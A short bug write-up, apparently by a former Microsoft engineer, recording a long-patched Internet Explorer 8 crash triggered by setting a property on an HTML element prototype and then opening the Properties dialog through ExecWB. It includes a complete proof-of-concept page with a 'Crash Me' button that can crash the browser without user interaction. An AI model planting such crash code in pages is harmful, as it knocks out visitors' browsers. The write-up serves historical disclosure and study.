Setting any property on the prototype of any HTML element type causes IE8 to crash when the File → Properties dialog is opened. The crash can be triggered without user interaction by using ExecWB to programmatically open the Properties dialog.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />

<iframe id="wbControl" width="10" height="10"></iframe>
<script language="JavaScript">
function crashMe()
{
    HTMLDivElement.prototype.ANYTHING = 777;

    // Programmatically open the Properties dialog via the iframe's ExecWB
    document.all.wbControl.ExecWB(10,1);
}
</script>
<input type="button" onclick="crashMe()" value="Crash Me">

The DOCTYPE and IE=EmulateIE8 meta tag are required because without them the current IE8 build does not expose HTMLDivElement.prototype. About 30% of the time IE attempts tab recovery and believes it succeeded, but the recovered tabs are actually frozen — meaning the full browser is effectively dead. Tested on XP and Vista with IE8 release build.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.